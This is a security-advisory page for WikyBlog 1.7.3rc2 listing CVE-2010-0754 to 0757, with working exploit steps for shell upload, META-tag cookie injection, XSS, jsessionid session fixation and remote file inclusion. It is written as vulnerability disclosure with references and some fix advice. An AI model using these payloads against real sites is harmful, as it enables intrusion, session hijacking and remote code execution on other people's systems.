SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

WikyBlog-1.7.3rc2 Mullti Vulnerability


Arrow  SecurityAlert : 7067
Arrow  CVE : CVE-2010-0754
Arrow  CVE : CVE-2010-0755
Arrow  CVE : CVE-2010-0756
Arrow  CVE : CVE-2010-0757
Arrow  CWE : CWE-79
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : Yes
Arrow  Credit : indoushka
Arrow  Published : 03.03.2010

Arrow  Affected Software : wikyblog:wikyblog:1.7.2
wikyblog:wikyblog:1.7.3:rc2



Arrow  Advisory Content :  

===========================================================================
=============
| # Title : WikyBlog-1.7.3rc2 Mullti Vulnerability
| # Author : indoushka

| # email : indoushka@hotmail.com

| # Home : www.iq-ty.com

| # Web Site : http://www.wikyblog.com/

| # Dork : Powered by WikyBlog

| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4
Ubuntu)
| # Bug : XSS

====================== Exploit By indoushka
=================================
# Exploit :

1- Upload Shell:

first Register in to web site http://127.0.0.1/Wiky/index.php/Attach/(your
name)?cmd=uploadform (use temper data)

secend go to http://127.0.0.1/Wiky/userfiles/(your name )/uploaded/ 2 find
you Ev!l

2- Cookie manipulation:

Vulnerability description:

This script is vulnerable to Cookie manipulation attacks.

By injecting a custom HTTP header or by injecting a META tag, it is
possible to alter the cookies stored in the browser. Attackers will
normally manipulate cookie values to fraudulently authenticate themselves
on a web site.
This vulnerability affects /Wiky/index.php/Special/Main/Templates.
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session
fixation attack. In a session fixation attack, the attacker fixes the
user's session ID before the user even logs into the target server, thereby
eliminating the need to obtain the user's session ID afterwards.

Attack details :
The GET variable which has been set to
<meta+http-equiv='Set-cookie'+content='userCmd=edit'>.

GET
/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<meta+http-equiv='Set
-cookie'+content='userCmd=edit'>

How to fix this vulnerability:
You need to filter the output in order to prevent the injection of custom
HTTP headers or META tags. Additionally, with each login the application
should provide a new session ID to the user.

3- Cross Site Scripting:

http://127.0.0.1/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+
src=http://127.0.0.1/HomeComputer.jpg+onload=alert(213771818860)>

4- jsessionid session fixation:

Vulnerability description:

This script is vulnerable to jsessionid session fixation attacks.

By injecting a custom jsessionid is possible to alter the session cookie.
Attackers will normally manipulate cookie values to fraudulently
authenticate themselves on a web site.
This vulnerability affects /Wiky/index.php/Main.
The impact of this vulnerability
By exploiting this vulnerability, an attacker may conduct a session
fixation attack. In a session fixation attack, the attacker fixes the
user's session ID before the user even logs into the target server, thereby
eliminating the need to obtain the user's session ID afterwards.

Attack details:

http://127.0.0.1/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfi
xation

http://127.0.0.1/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushk
asessionfixation

http://127.0.0.1/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixat
ion

5- RFI:

http://localhost/Wiky/include/WBmap.php?langFile=http://localhost/c.txt?


Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix
==========================================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)


Arrow  References :

http://www.vupen.com/english/advisories/2010/0468
http://www.securityfocus.com/bid/38386
http://www.exploit-db.com/exploits/11560
http://secunia.com/advisories/38699
http://packetstormsecurity.org/1002-exploits/wikyblog-rfishellxss.txt
http://osvdb.org/62558




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.